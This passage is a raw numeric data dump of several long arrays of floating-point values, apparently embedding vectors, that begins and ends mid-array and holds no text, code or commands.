0.017703582,-0.0009229356,-0.096584775,0.006481199,-0.022031883,0.016374437,-0.00038094103,0.03638038,0.044450004,0.0074640648,0.029342454,0.04589322,0.027404554,0.029542597,0.030403351,0.056853686,0.047531586,-0.022850526,0.0507892,0.07419041,0.00054315734,-0.035023436,0.0060999105,0.00965015,0.05439191,-0.02069281,-0.035810348,-0.02776754,0.0002838301,-0.024230197,-0.01592025,0.023561021,-0.017120246,-0.021772418,-0.044381477,0.0077145062,-0.053475074,-0.009358438,0.047209587,-0.0018225694,0.04346314,-0.04257862,0.055047624,0.010245325,0.001408817,0.021028558,0.016149053,0.011503538,-0.018881187,-0.0020516496,0.016720837,-0.07359783,-0.008527807,-0.032745797,-0.014219317,-0.07350818,-0.013441596,-0.021767475,-0.025112525,-0.023884062,0.009080756,-0.026891585,0.014258658,-0.0024426056,0.0014888673,-0.033587247,-0.025423061,0.07376813,0.024118716,0.033496927,0.022980995,0.041035224,0.00826202,0.013852268,0.043600395,-0.011423776,-0.007682715,-0.08913134,-0.008890805,0.005812739,-0.037903354,0.060903482,0.01081657,0.037914522,-0.016340056,-0.027666245,-0.01259708,-0.0050598662,0.04199999,-0.02052294,-0.06770265,-0.0152136,0.03272122,0.003518414,0.09184336,-0.040071137,0.012025777,-0.013515359,-0.0070956964,-0.047966573,-0.045211807,0.06658718,-0.02067455,0.021836895,-0.009797865,-0.0076316013,-0.03514615,-0.020994527,-0.029972829,0.057652947,-0.0187276,0.0046315277,-0.028458616,0.022678565,-0.04141438,0.023628848,-0.036489073,-0.0478418,0.034979366,-0.00077995926,-0.012076493,-0.0013160476,0.0011185509,0.01599663,0.030654583,-0.0019652704,0.10016616,0.025714325,0.03906276,-0.04382452,0.04103481,0.0067537483,-0.07568596,-0.023658693,-0.026881441,-0.030468063],[0.052040253,0.06037934,-0.15603355,-0.07454284,0.050413713,-0.041079424,0.012262294,0.09628972,-0.032354396,-0.021283852,0.01996203,-0.0015727552,0.112688914,0.05786459,-0.027195992,0.0031929961,-0.01785412,-0.032417193,-0.007915825,0.088434875,0.015422106,-0.02876883,-0.008367278,-0.05868468,0.052479237,0.0216252,-0.060819477,0.011419131,-0.037873767,0.0066172476,0.002680776,0.0029630004,-0.00955987,-0.01521336,-0.061058685,-0.0073138555,0.05639219,-0.008816733,0.031098707,0.041131545,0.0434407,0.0542543,-0.0009578256,-0.03092983,0.026108162,0.007888741,0.061831173,0.02622516,0.029707463,-0.07576671,0.01694338,-0.056398608,0.02678692,0.022498194,0.072251305,0.039158963,-0.040101387,0.00039214565,0.053147938,-0.07516555,0.033682533,0.03631279,-0.08209754,0.06309654,-0.03257685,-0.016304882,-0.02094759,0.04314143,0.017548136,-0.04954044,0.01974871,0.002182298,-0.00077319465,0.018331207,-0.07922228,-0.00017363191,-0.012035784,0.0014737697,0.008509186,0.05661724,-0.011766526,-0.02715886,0.063852355,0.009085533,0.03647539,-0.027224068,0.016549204,-0.041435584,-0.02429544,0.07407936,-0.0101419445,-0.052637585,0.024402853,-0.023428353,-0.055777535,0.000809004,0.03476571,0.010654189,-0.039704632,-0.04882581,-0.01586589,-0.01871385,0.017955553,0.01958154,-0.02743783,0.04071778,0.006021402,0.015042222,-0.03830679,-0.043909263,-0.018328175,0.045611616,0.0027508035,0.0153662,-0.043578748,0.004170423,0.08004453,0.023455814,-0.018873164,0.041395165,-0.05041481,-0.03006427,-0.015513855,0.040341068,0.0031846068,0.028348476,-0.05748685,0.023403523,0.02036207,-0.016081743,-0.036146607,-0.011679216,-0.025685173,0.023661667,0.048919063,0.074259035,-0.0068111033,-0.010494244,-0.0076298327,-0.035068166,0.007468796,0.025211895,-0.01578353,0.0011623624,0.011597039,-0.043246683,-0.003525714,0.0058180783,0.0013726723,-0.017682064,-0.021188369,-0.007426327,0.012117568,-0.0015384404,0.0047970447,0.015635181,0.01357667,0.029725349,0.0034442106,0.016053239,0.04025087,-0.041625444,-0.08856489,0.035367515,0.0157137,-0.021332333,-0.030931039,0.042340167,-0.033666752,0.033181783,-0.061544634,-0.04854877,-0.00049122283,-0.008048611,0.007705642,-0.0045570573,0.066985644,-0.03876898,0.04754114,-0.02815051,0.0071871597,-0.052114334,0.045360085,0.010467094,0.03627683,-0.028620675,0.0052795955,0.0042785485,0.038879227,-0.06078863,0.002722642,-0.025405094,-0.077531956,0.018879993,-0.028266413,-0.056033943,0.035030033,-0.008288697,0.031104136,-0.035472628,-0.06002294,-0.02212595,-0.078783415,-0.0121363085,-0.015965492,0.04792782,-0.0027192454,0.033439633,-0.027002374,0.037462197,0.082750656,-0.0019394503,0.0075789774,0.035350773,-0.039307624,0.001440455,-0.02109922,0.0043500327,-0.015037222,0.0045071747,0.003061964,-0.00488079,0.0066718557,0.0375204,0.039364077,0.01974066,-0.03928842,0.001976689,-0.043047722,-0.029021727,0.008523732,-0.09086476,0.02441618,-0.026317708,-0.00012400067,0.010377142,-0.0064139543,0.045205753,0.021327566,-0.0064668925,-0.008194085,-0.0035236112,-0.036572788,-0.032358043,-0.0092131095,-0.017627202,-0.007966897,-0.03239811,-0.00025634246,0.061924785,-0.0023056122,0.01293415,0.03759232,-0.004588506,0.04475157,-0.039272897,0.012488095,0.021369115,0.016635861,0.0606745,0.02256033,-0.038462635,-0.0030831518,-0.028642198,-0.040343426,-0.04791539,-0.05321559,-0.019320725,0.00596534,0.022175666,-0.008643598,0.030672489,0.009252364,0.017672308,-0.000785183,0.07235535,0.019367604,0.024119759,-0.03549395,0.017317574,-0.015236002,-0.051231753,-0.032689366,-0.005255888,-0.001967532,0.060972083,-0.0036237726,-0.040679,-0.012801667,0.040328853,-0.008040996,-0.0160612,-0.022799186,0.029181043,-0.011098412,0.034549683,0.023249166,-0.005595016,-0.023627086,-0.047843605,0.021879572,0.066933885,0.058049474,0.083513364,0.010985191,0.02337487,0.013877456,-0.027381673,0.003940362,-0.045529436,-0.00014948979,-0.013984626,-0.055371806,0.017557492,-0.00607398,0.03281187,0.050687734,-0.0010165399,0.02612268,0.0023277497,0.014089898,-0.014360536,0.031151261,-0.0768271,-0.014327729,0.062078632,-0.018530747,0.029999185,-0.011986286,0.026540864,0.070443556,0.054319188,0.016029825,-0.029151341,-0.05735619,0.022041062,0.002694939,-0.009325433,0.021425283,0.021565506,0.07904704,0.011821936,0.016434276,-0.053763773,-0.008257648,0.038801767,-0.013685345,-0.021827092,0.019591004,0.045371816,-0.006673251,-0.0008511795,-0.019281637,-0.022013957,0.043130994,0.027459577,0.028678076,0.03335962,0.014101083,-0.034234565,0.03818141,0.02816092,0.024705172,-0.012064373,-0.032965977,0.030821454,0.03485281,0.025911933,-0.025165198,-0.00063806045,-0.03452544,-0.026763322,-0.0065666502,0.025363544,-0.014478757,0.025447143,-0.024764968,0.02059883,0.014250991,0.008333308,0.026677556,-0.016143179,-0.02997488,-0.03659069,0.025063038,-0.0068806875,-0.048314545,-0.0099553075,0.004079332,0.016685857,-0.028610503,0.015614091,-0.015678104,0.007384933,-0.0004402338,-0.0031039738,0.02103095,0.013756138,-0.022165447,0.052730635,-0.030266844,-0.043229178,0.042207077,0.028877886,-0.03518837,-0.008692795,-0.031774234,-0.038483247,0.016897747,-0.009254802,0.018418571,0.023134049,-0.004767957,-0.021612288,-0.00072649255,-0.011712945,0.04165364,0.030707175,0.02314376,-0.029088223,0.0018098657,0.0026341616,0.030584462,0.046569433,0.013880686,0.026695993,0.010223111,0.03664433,0.016615018,-0.06683147,0.050671306,0.012097639,0.057903673,-0.022408305,-0.01885347,0.012903668,0.0058797025,0.10653966,-0.012778379,0.015776971,0.02258991,-0.053557944,-0.035279393,-0.035894103,0.0063831937,0.07383548,0.095353395,-0.03228023,-0.0666736,0.031341016,-0.014736548,0.015541138,0.033972174,0.0067011965,0.104611754,-0.062068954,-0.041857846,-0.00875522,0.039511934,0.012294991,0.027903382,0.0249606,-0.041890536,0.04394363,0.00017561989,-0.04614819,-0.025303524,-0.024313504,0.040355362,0.07083361,-0.049261235,0.011653997,-0.013877504,-0.03265542,0.0067836633,0.03633873,-0.03417282,0.036515266,0.0053768717,0.040478848,-0.0106969355,-0.07823538,-0.02570119,-0.035519116,-0.016928643,0.03238851,0.034529448,-0.03790475,-0.012536095,-0.025944673,0.011539738,0.012220225,0.022421652,-0.029200185,-0.039584626,-0.050854597,0.007782905,0.018371282,0.02299417,-0.011020697,-0.0113054905,0.04512301,-0.017551264,0.006901122,-0.0076376963,-0.006991242,0.06309643,-0.03123365,-0.03943537,0.014253965,0.018815951,0.004615843,0.008633543,0.05013587,0.048307043,-0.031686172,0.047832217,0.06893173,-0.0672962,-0.012919488,0.04443163,-0.048999436,-0.050414823,0.014539927,-0.03463541,-0.009818366,-0.037944455,-0.056333773,0.03564873,0.0051994254,-0.0037023365,-0.015887277,-0.048120618,0.036770765,0.013154783,-0.009352662,-0.039371137,0.02622005,0.04670817,0.027437532,0.020464685,0.007538351,0.033476602,-0.011191119,0.027027477,-0.06328828,0.010744368,0.0035804335,-0.000035164325,-0.060990613,0.0155552365,-0.038004942,0.030199539,-0.009669726,0.00070797,-0.022295218,0.0016768386,-0.047690134,0.007925977,-0.027211012,0.0036404026,0.021304317,0.064124495,0.01690264,-0.00864448,-0.00040710336,0.012584185,-0.016633468,-0.011336595,0.052165564,-0.0059921048,-0.07304243,0.053289622,-0.0027969887,-0.012184033,0.0096794665,0.03138756,-0.018993871,-0.040686075,-0.055386975,-0.014558191,-0.020476291,0.046334784,0.026762024,-0.045208555,0.01170468,-0.049667258,0.013132233,0.031497654,-0.05128241,-0.03686543,0.0011331727,0.039899033,-0.02141257,0.02227136,-0.003167823,0.011140375,-0.041023117,-0.07763709,-0.07188113,0.0076005147,0.027483309,0.05686287,-0.04109018,0.03600428,0.05546692,-0.011562082,0.038949754,-0.022292513,-0.03634782,-0.0038405228,0.002915515,-0.029374106,-0.031067839,0.010804218,-0.07291146,0.026869845,-0.0040585133,0.019872062,-0.021208122,-0.014880662,-0.01634033,0.04889091,-0.104458734,0.012122101,0.025567155,-0.022100635,-0.05108371,0.03935341,0.026438225,-0.07239689,0.020877589,-0.05781003,-0.009793827,-0.12341016,-0.0035867298,-0.049480055,0.052709717,0.03398655,0.046736304,0.007150869,-0.017591855,0.021083832,0.008497478,0.018685624,-0.013777157,0.011465372,0.06415983,0.020911187,-0.014669285,0.07002224,0.08449468,0.01665342,-0.03353,-0.012442307,-0.0038173266,0.023262883,-0.021108283,-0.016777718,-0.040826358,-0.014405663,-0.00097460015,0.021506362,0.0033491757,0.038604602,-0.004839588,-0.01706125,0.028567037,-0.031817254,-0.045699526,0.04178401,0.009756742,-0.018295465,-0.016740542,0.045405675,0.010106558,0.027562577,0.026580416,0.012711929,-0.0063622645,0.008451532,-0.041020792,0.022897424,-0.02153861,0.028274296,-0.0655528,-0.056860443,-0.0025328507,-0.07644459,-0.042841144,-0.06368593,0.0069840737,0.006509896,0.010434416,0.0088683935,0.029881164,0.024052842,-0.045351844,0.0030216253,0.049038827,-0.012262312,0.02601395,0.023825282,-0.005502173,0.020077026,-0.030853126,0.014011279,-0.027549306,0.009578082,-0.07020401,-0.0307236,-0.02556335,-0.02594942,0.05393358,0.012303853,0.017355679,-0.038355414,-0.05138219,-0.026409548,0.052957773,0.028078629,-0.00818566,-0.045283344,0.009034855,0.053504363,0.0039585745,0.086635664,-0.045285832,0.020066889,-0.029620988,0.009397174,-0.05922787,-0.024886437,0.0727527,-0.028982753,0.021473233,0.0041588624,-0.027242731,-0.07709143,-0.04896526,-0.01087334,0.06908659,-0.00055849575,-0.022605045,-0.044065,-0.023491371,-0.06278081,0.03227927,-0.022198753,-0.055092163,0.011561681,-0.033760373,-0.01833345,0.006689961,0.00011925655,0.010569297,0.051906466,0.012205123,0.114244446,0.03449515,0.0027724726,-0.034441486,0.0036135504,0.0039106635,-0.025349991,0.02236987,0.014939564,-0.029037174],[0.0016027794,0.05596729,-0.19139662,-0.037443645,0.10383216,0.02977843,0.05800241,0.029914757,-0.00052943535,-0.013865005,0.018038534,-0.01283511,0.09694254,0.016896173,-0.0045880964,-0.010763736,-0.0086835595,-0.091808215,-0.021712307,0.030072965,-0.028110966,-0.028577836,-0.0005189327,-0.0140538905,0.012912883,0.0047396286,-0.036392536,-0.04596215,-0.03985308,0.0045755184,0.007038258,-0.009856033,-0.016313823,0.021738097,-0.04645932,-0.023042014,0.023632575,0.028769165,0.017342862,-0.031885207,0.054838043,-0.0023202784,0.030817144,-0.04897564,0.015522191,0.010129079,0.007908077,-0.0141551355,0.075051755,-0.058532596,0.030055484,-0.009156401,0.061289042,0.04139051,0.055450413,0.03586399,-0.02162628,0.010068365,0.014021914,-0.08171733,0.07587528,0.056959927,-0.095035106,0.07049374,-0.019603437,-0.024891242,-0.02314514,0.02289898,-0.0075337696,-0.06408845,0.011470919,-0.0090478,0.018717987,0.044759013,-0.034398675,-0.017432142,-0.02473834,-0.013674015,0.013286819,0.035699844,0.0077230535,0.0042221174,0.07540241,0.014006873,0.021802735,-0.037277073,-0.036948476,-0.013802984,-0.0025849422,0.10648352,0.02363781,-0.0014880791,-0.010546958,0.0012563409,-0.03220432,-0.014279545,-0.018267203,-0.009285219,-0.015485692,0.0031159928,-0.040469058,-0.027435927,-0.0042692074,-0.00032672085,0.005095683,0.040352747,0.015292371,-0.013355366,-0.04287955,-0.02808271,-0.012788447,0.081578724,-0.03448248,0.0077498145,-0.060007416,-0.015625054,0.048532564,-0.0016666503,-0.0086822305,-0.0017479216,-0.0069321147,-0.036866687,0.0014889467,0.045657437,0.0061145048,0.05874834,-0.046121445,0.022634791,-0.004339758,-0.0424892,-0.029747931,0.020375108,-0.048860382,0.0072371857,0.030942988,0.08257888,-0.030173402,0.006881659,0.048454225,0.019773966,-0.009955028,0.05869171,-0.029323975,-0.021665694,-0.02454265,-0.055576015,0.027643707,0.011245349,-0.0016287294,0.00823319,0.005822727,0.046156514,-0.008741238,0.003425497,-0.026063696,-0.010575466,0.025098864,-0.003193211,0.032996327,-0.032371312,0.052059658,0.007972857,-0.06909996,0.03912952,0.043396764,-0.033931877,-0.0070939967,0.0056291227,-0.006093883,0.028298404,-0.055039838,-0.012686276,0.008200824,-0.0071915886,0.0120577905,-0.028217835,0.036581084,-0.019824833,0.0021248225,-0.05710174,0.0025732494,-0.023576597,0.01299764,0.0137268035,-0.00024183017,-0.033383634,-0.01232921,-0.004759963,0.024709051,-0.0331308,0.013983109,0.01992188,-0.07413247,-0.020947557,-0.027260333,-0.04449435,0.045267746,-0.00403492,0.04498082,-0.049628604,-0.05714802,0.0018371863,-0.068383865,0.01631528,-0.047328874,0.03394822,-0.0034381626,0.022119453,-0.035353255,0.072359525,0.06425814,-0.016469443,-0.009031417,0.0026736048,0.014377213,-0.0022259296,-0.025841624,-0.03881193,-0.015193879,-0.0027633305,0.01474213,-0.009956331,0.003266159,0.036989152,0.020678824,-0.02081225,-0.072951354,-0.02908887,-0.057871312,-0.00014202358,0.020878889,-0.13384068,0.028300112,-0.01218512,0.041091032,0.065719396,0.013904168,0.06005684,0.02780689,0.032985523,-0.023704167,0.034803372,-0.04797788,-0.01756484,-0.03938174,-0.040080074,-0.007540423,-0.008784725,-0.03665174,0.061722923,0.022795206,0.0056252447,0.034498096,0.0033167074,0.010124544,-0.0369258,0.020164395,0.037840825,0.03714163,0.041561723,0.03857196,-0.05390906,0.008521795,-0.036304414,-0.043601703,0.0026248659,-0.06321416,-0.021746365,0.03054615,0.0035049159,0.050161503,0.0063202023,0.013087645,0.034459133,0.0038889162,0.010773973,-0.029006341,-0.012722818,-0.016794454,0.0132974805,-0.05544836,-0.026517872,0.0034669791,0.018745376,0.010627247,0.011319164,0.036671035,-0.010623836,0.030109681,-0.014592825,0.006405792,0.006079325,-0.019865928,0.031023176,0.010994962,0.03247886,0.042673048,-0.0012336365,0.013695238,-0.06509688,0.030232329,0.037293658,0.08675624,0.042528354,-0.01926867,0.010949912,0.009332185,-0.015622067,-0.010899028,-0.056624234,-0.04337297,0.0037838188,-0.030846966,-0.046593316,-0.01071778,0.0035513546,0.029483644,0.010353643,0.039743237,0.02031355,0.031694263,-0.02303154,-0.008109112,-0.07189489,-0.018382272,0.08582614,-0.042130515,-0.009484271,-0.023545299,-0.0019461063,0.05425785,0.06213202,0.03424438,-0.04178271,-0.04443343,0.037345577,0.05798549,-0.01023891,0.0002671413,0.01588452,0.029517233,0.0011741712,0.011903243,-0.004132316,0.026211897,0.026451582,-0.029929025,-0.039430406,0.022490662,0.046520192,0.020416804,0.027669005,-0.027673813,-0.028680287,-0.0071916007,0.043926474,0.03625849,0.045381382,0.016504934,-0.036426406,0.048594747,0.037638035,0.03614296,-0.019068804,-0.010018258,0.031879332,0.009219792,0.016567418,-0.013969209,0.03144359,-0.051734157,-0.06843261,-0.006247911,0.027495401,-0.016680485,-0.0071692183,-0.074616045,0.012197249,-0.033455476,0.024524806,0.040683758,-0.026683498,-0.02976216,-0.02272988,0.016011966,-0.015383753,0.0013130473,-0.022917014,0.010596905,0.05417262,0.001612589,-0.028922498,-0.012652874,0.033768453,-0.0077436874,-0.02667975,-0.041324403,0.026046356,-0.0075985645,0.05697011,-0.049015097,-0.03606607,0.042058907,0.0049904124,-0.035379928,-0.00910663,-0.04454293,-0.0029364617,0.014012448,0.0059202984,0.041210353,0.021641418,-0.02616621,-0.04599405,0.025215007,0.036227815,-0.0032813584,-0.03893927,-0.026773093,-0.021476997,0.009287596,0.017669028,0.05498465,-0.000687784,0.021487033,0.021788808,0.026346657,0.03320428,-0.029970787,-0.06282642,0.07979,0.00014903712,0.018109903,0.010638175,0.030645031,-0.0065616746,0.034244277,0.057888955,0.01150911,0.049979903,-0.003509949,-0.050465666,-0.032890067,-0.018166365,0.02415481,0.078494474,0.0074477163,-0.001416035,-0.04367701,0.049145278,-0.013222343,0.013913381,0.026349869,0.04335924,0.09921352,-0.04780204,-0.017365815,-0.011869153,0.031800866,0.014857616,-0.0031212072,-0.00682248,-0.0984512,0.023503836,0.01314456,-0.008073496,-0.0013638223,-0.038903564,0.02093195,0.025609506,-0.054946125,0.024006238,0.023751961,-0.006666666,-0.048912868,0.05852746,-0.019662209,-0.018622383,0.021882681,0.082089305,0.0032083145,-0.032892875,-0.026388153,-0.066771045,0.009845505,0.03417862,-0.0008860095,-0.058245692,-0.0048353504,-0.0023326506,0.003922546,-0.00055442814,0.02815468,-0.008479772,-0.052605957,-0.014303063,0.0014254694,0.027879765,0.03822176,0.02057202,-0.008914053,0.039559945,0.019796861,-0.00014235787,-0.002697517,-0.0064550946,0.044874106,-0.013683569,-0.064016715,0.02418675,0.019753754,-0.0030735035,0.046254016,0.05847497,0.07844674,-0.028657574,0.017419977,0.03514317,-0.061390642,0.0044763847,0.046218324,-0.035348274,-0.029050104,-0.014081852,-0.06931914,-0.00059629884,-0.005334215,-0.0800288,0.026057007,0.016876824,0.01453696,0.031221487,-0.054047424,-0.015194477,0.016800083,-0.0058684186,-0.028275084,-0.011537701,0.019606896,0.035259075,0.0067958813,0.07944968,0.058764707,-0.021511221,0.06393643,-0.021538446,-0.018566195,0.01632296,0.034550782,-0.10477648,-0.002156494,-0.04936148,-0.020729676,-0.0056282,0.011810938,-0.05780122,-0.013666609,-0.056932997,-0.035685614,-0.06635385,-0.022010198,0.028564842,0.060235463,0.013115507,0.002554285,-0.037338767,-0.021853073,-0.0011052286,-0.012570528,0.029879732,-0.028060546,-0.08644908,0.00094102207,-0.0068227584,-0.00011621656,0.014860997,0.02091974,0.002507649,-0.01661175,-0.09521019,0.04230669,-0.063129,0.050606597,0.011054419,-0.010388351,-0.04329935,-0.0677619,0.013137645,-0.01082873,-0.02309474,-0.02182633,0.014985317,0.03486708,-0.025572767,-0.010998924,-0.021359714,0.003736379,0.0030481794,-0.08157641,-0.0583161,-0.0084468145,0.002224384,0.023770645,-0.05569004,0.0671579,0.058227267,0.014719118,0.037224185,0.014341482,-0.022231711,-0.008342301,0.034835387,-0.014389116,-0.0019741363,0.008421087,-0.04038589,0.050853595,0.00840091,-0.0016824547,-0.050344102,-0.031565744,-0.032250315,0.054620363,-0.038834237,0.0037131796,-0.013707287,-0.008767569,-0.026510289,0.012793247,0.04038961,-0.06858982,0.035720155,-0.013488923,-0.005184186,-0.052558053,0.00074331806,-0.014508648,0.016621795,0.024199432,0.044985447,0.02750572,-0.0032896467,0.00795022,0.0089534605,0.029874215,-0.042763554,0.021859676,0.05905936,0.04652089,0.019282319,0.09538203,0.056592055,0.028080737,-0.033841647,0.019994363,-0.017655917,0.051689636,-0.012434809,0.04156731,0.022360682,0.010921989,-0.023711812,0.02331283,-0.039228357,0.015052996,-0.020547148,0.00054679863,0.008680292,-0.06749953,-0.0071747648,0.061477087,-0.018137049,0.013732452,-0.03629709,0.00084661855,0.028971592,0.0057495967,0.047660336,-0.0032053133,-0.014621391,-0.020768182,0.012912081,0.022178197,-0.05112739,0.024647126,-0.034671824,0.020264199,-0.0043382635,-0.026058033,-0.0035080912,-0.033844654,-0.04312073,0.009816044,-0.025011357,0.0039323894,0.026655722,0.00034576765,-0.010684266,0.02496229,0.057139352,-0.011431687,-0.021919731,-0.011727121,0.035913754,-0.0351779,-0.009925217,-0.0041630343,-0.0046163024,-0.0015224871,-0.034806307,-0.020527529,-0.0017765259,-0.02479253,0.032621842,0.04614719,0.010352618,-0.044458285,-0.027914898,0.00599297,0.004096504,0.049798198,-0.026734993,-0.044563543,-0.016366882,0.011090147,0.0026141328,0.05140412,-0.037692197,0.012619505,-0.01921381,0.010541497,-0.020446595,-0.030531593,0.06794273,-0.0051990543,0.03909911,0.0031106835,-0.008872904,-0.08045129,-0.016691603,-0.07259242,0.03289727,-0.016929341,-0.011186303,-0.028270293,-0.01429668,-0.0048312913,0.07080788,-0.014555077,-0.009183075,-0.017294057,-0.00029848987,-0.029676242,0.00785862,-0.024029445,-0.012267652,0.041561194,0.029890835,0.15205997,0.021163084,0.0063388357,-0.027678002,0.076980785,-0.0034535832,-0.059506297,-0.016859012,-0.044006046,-0.017137866],[-0.032759946,0.06996676,-0.18731698,-0.021818867,0.10656391,-0.0009787454,0.092546314,0.051485345,0.014057687,-0.020873819,0.009437684,0.040794164,0.08067383,0.028218282,-0.0096691875,-0.019940203,0.04401285,-0.09361121,-0.04148044,0.021043008,-0.013309839,-0.019877909,-0.009372221,-0.03537204,0.043612476,-0.0021018651,-0.05055735,-0.03169584,-0.02372781,0.00833208,0.0720736,-0.09257192,-0.008552199,-0.017130423,-0.06831156,0.0037273027,0.064902365,0.019537183,-0.009128283,-0.04610599,0.040026806,0.018730884,0.01714087,-0.0071851304,0.01970683,0.045210257,0.035900205,-0.01178204,0.03589793,-0.037565283,0.0038442512,-0.0066054636,0.016222343,0.0877373,0.09279708,0.048661284,-0.01415441,0.034423497,0.005107368,-0.06647423,0.092366636,0.066008605,-0.10222242,0.02246134,0.0017361741,-0.022141416,0.0002555716,0.048999358,-0.006562018,0.0019928778,-0.009844749,-0.009954582,-0.05511843,0.044595838,-0.026043987,-0.023948299,-0.0023792805,-0.009480077,-0.038237903,0.059105173,0.03851474,-0.000003929473,0.059060138,0.0026135354,0.012735887,-0.013819773,-0.012691191,-0.013815769,-0.03416326,0.077009164,0.018077558,0.026459169,0.01278225,0.047781404,-0.051140253,0.041745827,-0.015901344,-0.0019191237,-0.0043382836,-0.011616046,-0.032255623,0.0026835985,0.03722526,0.010301962,0.029612068,0.02304279,0.0028255,-0.0003194069,-0.028947853,0.006096232,-0.07702174,0.033441126,-0.006992829,-0.011047864,-0.0271903,-0.0036977464,0.012455526,-0.011992345,-0.019101124,0.06690833,-0.022555433,-0.02252338,0.007204411,0.057423767,-0.010300594,0.035295393,-0.06434006,0.0010293461,0.006081002,-0.026855238,-0.0018587863,-0.05174101,-0.049277592,0.012812392,-0.00013762563,0.08894602,-0.03856082,-0.005201331,-0.0046592415,0.047173414,0.007162269,0.030769605,-0.009870326,-0.02189458,-0.028744835,-0.0112758055,-0.008126342,-0.010318435,-0.02590051,0.034807056,-0.009516429,0.0009741011,-0.007455982,0.03790189,0.028272808,-0.03579838,-0.029461099,-0.0016170163,0.05082562,0.022877306,0.056153283,0.024892263,-0.029382681,0.042656478,-0.0051229857,-0.030089775,0.003378957,0.020264324,0.0033384284,0.050910044,-0.0788444,-0.03758778,0.008155234,-0.04563859,0.010431509,-0.010485335,0.081254624,-0.024628935,0.0010236218,-0.015853966,0.040155634,-0.039130922,0.05439814,0.044429302,0.012037621,-0.039896954,-0.010452869,0.016343778,-0.032036863,-0.03187164,-0.005392534,-0.026699392,-0.06425607,-0.038950242,-0.06269353,-0.02681477,0.0428953,0.008090935,0.009878772,-0.008403889,-0.04796805,-0.014091892,-0.022112146,-0.04166849,-0.016359933,0.05855643,0.025530031,0.0040927,-0.036550023,-0.006394159,0.03699809,0.01470625,0.06851777,0.017658113,0.022460897,-0.0031685897,-0.00787608,-0.019582897,-0.014178939,0.009197234,0.0098162815,-0.025503563,-0.0535111,0.001386536,-0.004828114,-0.019161096,-0.020647787,-0.03616746,-0.044178944,0.025345398,0.008437404,-0.0821048,0.046578508,0.008047485,0.024709258,-0.0068443026,0.012713832,0.031985387,0.018655725,0.0823214,0.0272816,0.04108314,-0.027778586,-0.015378703,-0.025132205,-0.045465175,0.0341074,-0.015436573,-0.019768056,0.017699616,0.025186203,0.038782604,0.019912899,0.0054202834,0.018589873,-0.00818837,-0.022701249,-0.0209784,0.06276091,0.054356232,0.040691823,-0.018927567,0.012685255,-0.018197304,-0.030040102,0.008892414,-0.05198244,-0.009718602,0.009359463,0.010586755,0.020239074,0.034270246,0.02242902,0.04461483,-0.017690988,0.0292508,-0.011428896,-0.01801194,-0.004576051,0.016963074,-0.035747897,-0.039871722,-0.023205321,0.026824545,0.0051575503,0.031081147,0.049020126,-0.012917648,0.025170716,0.028934708,0.0043196613,-0.019910246,0.022315899,0.035215475,0.016456801,0.02033706,0.07839906,-0.013454675,0.022464857,-0.03970407,-0.00562855,0.054212496,0.05442861,0.007894001,-0.041167695,-0.02644716,0.0062569785,0.008804779,0.01843742,-0.020360257,-0.090427674,-0.04312237,-0.073012955,-0.040109478,0.025934706,-0.007447631,0.044638447,0.049723603,0.054468483,0.017559139,0.057010684,-0.036262188,-0.0617637,-0.056470297,-0.006628675,0.026176915,0.033261735,-0.018533139,0.00952205,-0.012658651,0.040119115,0.047813352,0.031152029,-0.04740423,-0.009447881,0.0042597037,0.0021416652,0.027294645,-0.033088066,0.03292375,0.06284351,-0.000723163,-0.00044489736,-0.021256156,-0.015010976,0.025858767,-0.005539556,-0.0026177263,-0.0030110786,0.029090278,-0.01552997,0.027550625,-0.033144876,0.0011547436,0.04078314,0.040632207,0.05888014,0.024482174,0.018984372,-0.041069828,0.02605349,0.010514566,-0.01042955,-0.025554918,-0.029165348,0.010561788,0.042064656,0.0067310813,0.026289392,0.047171384,-0.014586295,-0.0064635966,0.008094155,-0.00088875374,-0.027735287,0.029722948,-0.011285093,0.00933926,0.008503062,-0.019564139,0.02614895,-0.0090160305,-0.01340779,-0.000056086803,0.0137763815,-0.018882459,0.017475452,-0.033782057,0.031487234,0.016136935,-0.0016751027,-0.00416369,-0.026662396,0.02228902,-0.009367421,-0.030002354,0.066120975,-0.030194815,0.013235666,0.066217445,-0.06369235,-0.029181663,0.022910828,0.022829127,-0.07169928,0.0005236081,-0.020713836,0.01255219,0.035492606,-0.013698552,0.020834409,0.00947654,-0.042399187,-0.062004734,-0.0069067064,0.055829495,0.03995772,-0.0049865884,-0.012348825,-0.019632468,0.010897034,0.020212686,0.020796664,0.017727839,-0.02029285,0.047145348,0.053808037,0.015842991,0.006095024,-0.025146969,0.09153733,-0.016794154,0.0071203574,-0.018042376,-0.0060229623,0.027736872,0.01730054,0.04598375,-0.0032583077,0.04868962,0.009274154,-0.017416537,-0.046498865,-0.054964904,-0.0010664175,0.041173402,0.06212828,-0.015969627,-0.06112134,0.060721952,0.011551766,0.019094508,0.08584713,0.007470431,0.061346203,-0.04430059,0.005151995,-0.0046465183,0.05353966,0.02444769,0.021248678,0.01411375,-0.05930758,0.015844196,0.009466571,-0.009839772,0.015493033,-0.0645485,0.04611114,0.09587151,-0.051794548,-0.012608182,0.013334583,-0.01350991,-0.010732525,0.015025974,-0.052989576,-0.009595987,0.0061842087,0.03136999,0.008454604,-0.016421461,-0.02833155,-0.044264656,-0.030366013,0.014583152,-0.0062066587,-0.0076201046,0.00003424893,-0.045893773,0.034608137,0.03718387,0.0006840708,-0.04717656,-0.05549432,-0.035400487,-0.023671214,0.053718954,0.052139044,-0.0050960896,-0.007194005,0.029939188,-0.022187576,-0.025842635,0.03236054,-0.035096314,0.06037358,-0.06481605,-0.06950988,0.012229294,-0.023061058,-0.0006518241,0.008868686,0.0055116485,0.0351412,-0.02942369,0.037601445,0.018461982,-0.04782662,0.029968617,0.056903493,-0.02827212,-0.034412485,0.004268705,-0.071604766,0.033340096,0.014028803,-0.057754032,0.066043414,-0.0088993935,0.040400937,0.022023361,-0.014387445,0.017368507,0.011708405,-0.023907047,-0.032663863,-0.02680687,0.027625097,0.017413605,-0.012916822,0.031090852,0.062241107,-0.03175181,0.009267553,-0.024867106,-0.050815415,0.0155805005,0.012294258,-0.081504695,0.03832841,-0.08320619,0.012910291,-0.039488036,-0.012037295,-0.0026846172,-0.0028044144,-0.023630552,-0.03602598,-0.0628052,-0.031340078,-0.0053208256,0.0496131,0.01007335,0.00272315,-0.0072866273,-0.005205464,0.0059473068,0.015855422,-0.0031548932,-0.021335356,-0.082277454,-0.021087209,-0.03140851,-0.014320951,-0.017920405,0.008590808,-0.0027627249,-0.027268082,-0.048667826,-0.008223712,-0.02601269,0.0130413985,0.015770549,0.0058084126,-0.028710011,-0.09416725,-0.01007157,-0.023545777,-0